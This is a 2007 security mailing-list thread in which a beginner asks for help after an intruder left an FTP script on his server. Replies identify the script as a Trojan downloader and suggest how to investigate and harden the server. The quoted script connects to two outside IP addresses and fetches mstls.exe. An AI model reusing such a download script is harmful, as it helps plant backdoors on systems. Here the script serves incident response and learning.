RE: what next

["Murda Mcloud" <murdamcloud () bigpond com>]

Hi Nemanja, 
For me next would be determining how it got into your server. Was it from
outside or inside the perimeter? Can you see evidence of this 'access' in
your logs-firewall/server etc? 
Any other files that were modified at the same time as that file was
created?
Did it spawn any other exe's? Do you use the server for browsing-is it
necessary? How can you harden it? Is it patched and up to date with virus
defs? Was it actually an 'attacker' sitting at a console placing it on your
server or was it some drive by download?
Are there services that you could disable on the server that are
unnecessary?



-----Original Message-----
From: listbounce () securityfocus com [mailto:listbounce () securityfocus com] On
Behalf Of Justin
Sent: Wednesday, February 07, 2007 1:19 AM
To: nemanja.janic () centroproizvod co yu
Cc: security-basics () securityfocus com
Subject: Re: what next

nemanja.janic () centroproizvod co yu wrote:
> Hello list,
> i wasn't sure where to post this, and since i'm just starting out in
security, i figured that this is the place.
> Here goes:
> i've had a fine unknown gentleman enter at his will to my server; among
other things he left behind a file named tt (no extension) which contained
the following lines:
> open 80.93.223.22 14547 
> user 1 1  
> get mstls.exe  
> quit  
> open 80.71.219.134 5191 
> user 1 1  
> get mstls.exe  
> quit
>
> I figure this is some script to be used with ftp, or at least i think so. 
> I did tracert to those adresses, but that's where i'm stuck. What can i do
next? 
> And any idea what that mstls.exe is? I deleted it, but it was 0 bytes in
size. 
> Thanx in advance.
>
>   
http://www.greatis.com/appdata/d/m/mstls.exe.htm -- Trojan/Backdoor


The file is an FTP script to StnyFtpd (for the ip address: 80.93.223.22).

Goodluck
-Justin